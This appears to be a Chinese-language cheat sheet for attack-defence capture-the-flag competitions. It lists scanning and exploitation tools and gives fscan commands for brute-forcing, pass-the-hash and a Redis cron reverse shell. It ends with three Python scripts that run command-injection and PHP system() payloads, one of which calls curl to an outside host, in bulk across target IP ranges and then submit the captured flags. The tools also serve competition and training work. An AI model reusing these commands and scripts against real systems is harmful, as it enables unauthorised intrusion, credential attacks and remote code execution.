fscan(漏洞扫描)

下载

下载地址: Releases · shadow1ng/fscan · GitHub

把下载的文件放到指定文件目录里,

在文件的位置打开cmd

输入 fscan64.exe -h 192.168.1.1/24

ok了

接下来说说fscan的使用

使用

1.信息搜集:

• 存活探测(icmp)

• 端口扫描

2.爆破功能:

• 各类服务爆破(ssh、smb等)

• 数据库密码爆破(mysql、mssql、redis、psql等)

3.系统信息、漏洞扫描:

• 获取目标网卡信息

• 高危漏洞扫描(ms17010等)

4.Web探测功能:

• webtitle探测

• web指纹识别(常见cms、oa框架等)

• web漏洞扫描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

• redis写公钥或写计划任务

• ssh命令执行

6.其他功能:

• 文件保存

命令如下:

.\fscan64.exe -h 172.17.171.10 -p 1-65535

fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
fscan.exe -h 192.168.1.1/16  (B段扫描)fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)

Aazhen-V3.1

下载:GitHub - zangcc/Aazhen-RexHa: 自研JavaFX图形化漏洞扫描工具，支持扫描的漏洞分别是： ThinkPHP-2.x-RCE， ThinkPHP-5.0.23-RCE， ThinkPHP5.0.x-5.0.23通杀RCE， ThinkPHP5-SQL注入&敏感信息泄露， ThinkPHP 3.x 日志泄露NO.1， ThinkPHP 3.x 日志泄露NO.2， ThinkPHP 5.x 数据库信息泄露的漏洞检测，以及批量检测的功能。漏洞POC基本适用ThinkPHP全版本漏洞。

ThinkPHPGUI

下载:GitHub - Lotus6/ThinkphpGUI: Thinkphp(GUI)漏洞利用工具，支持各版本TP漏洞检测，命令执行，getshell。

Diffmerge(比较不同)

下载: SourceGear | DiffMerge

Windows版本不支持自定义安装目录,默认是:C\ProgramFiles\SourceGear\Common\DiffMerge\

D盾(扫描文件漏洞)

下载: D盾防火墙

D盾免杀:D盾安装使用及D盾免杀_d盾官网-CSDN博客

Seay(代码审计)

下载: GitHub - f1tz/cnseay: Seay源代码审计系统

watchbird(waf)

下载:Releases · leohearts/awd-watchbird · GitHub

将waf.so,watchbird.php文件存放在/var/www/html或其他目录中

确保当前用户对目标目录可写

执行php watchbird.php --install [Web目录], 安装器将输出安装了watchbird的文件路径

访问任意启用了waf的文件, 参数?watchbird=ui打开watchbird控制台, 创建一个初始密码

如需卸载, 请在相同的位置输入php watchbird.php --uninstall [Web目录], 如果您多次运行了安装,请多次运行卸载直到卸载器无输出

网站备份文件泄露扫描

地址:GitHub - sry309/ihoneyBakFileScan: 多进程批量网站备份文件泄露扫描工具v0.2

批量攻击提交flag脚本

import requests
def regeister():url ='http://localhost:8801/index.php?c=User&a=register'data = {'username':'1234','password':'1234','sex':0,'age':18}res = requests.post(url=url,data=data)if res.status_code == 200:print('注册成功')else:print('注册失败')
def login():url1='http://localhost:8801/'grame = {'username':'1234','password':'1234',}res = requests.post(url=url1,data=grame)if res.status_code==200:print('登录成功')else:print('登录失败')
def usevu():url2 = 'http://localhost:8801/index.php?c=User&a=ping'data={'host':';cat /flag'}res = requests.post(url=url2,data=data)if res.status_code==200:flag=res.textprint(flag)return flagelse:print('查找失败')
def submit(flags):url = 'http://localhost:19999/api/flag'headers={"Content-Type": "application/json","Authorization": "e8b084904533203d71dbc24f6f2009c5"}flag=flagsdata = {"flag":flag}res = requests.post(url=url,json=data,headers=headers)if res.status_code==200:print('提交成功')else:print('提交失败')
if __name__=='__main__':regeister()login()flags=usevu()submit(flags=flags)

import requests
import re
​
path = '/WebApi/competitionCyberRange/static/base/#/competition/route/competiManage/competiAnswer'   # 攻击路径
​
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0',
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8","Accept-Language": 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Cookie': 'JSESSIONID=823B9BC42B2A423CD515CEAEC3ECCDAA'
}
​
data = {'ip': '127.0.0.1|arp -a','Submit': 'Submit'
}
​
#flag提交地址
url_flag = 'http://10.0.0.1/submit.php?token=123456&flag='
​
#批量攻击和提交
def attack():with open('urls.txt', 'r') as file:for line in file:url = line.strip()  + path      # 攻击urlret = requests.post(url=url, headers=headers, data=data, timeout=10)#print("Response:", ret.text)  # 调试输出flag_match = re.search(r'flag\{.+\}', ret.text)if flag_match:flag = flag_match.group()print("Flag:", flag)flag_url = url_flag + flag#res = requests.post(url=flag_url,headers=headers,timeout=2)   #注意这里的headers可能有问题，需要根据实际情况修改print(res.text)else:print(line.strip() +  " Flag not found")
attack()

import requestsfor i in range(101, 200):url = f"http://172.19.{i}.42/api/v1.token/test"try:headers = {'Referer': 'system("curl http://10.10.1.50:9028/competition/flagManager/getFlag");'}req = requests.post(url, headers=headers)print(f"172.19.{i}.42", end="-")print(req.text)except Exception as e:print("next")

ehole(指纹识别)

下载: https://github.com/EdgeSecurityTeam/Ehole/releases

使用: .\EHole_windows_amd64.exe -u https://xxxxx

cms漏洞库:https://github.com/jayimu/vul_wiki

识别出来进行复现